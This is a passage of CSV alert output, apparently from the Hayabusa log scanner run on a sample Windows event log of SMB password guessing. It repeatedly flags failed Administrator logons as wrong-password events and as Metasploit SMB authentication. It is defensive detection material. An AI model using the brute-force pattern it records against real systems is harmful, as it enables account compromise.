Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 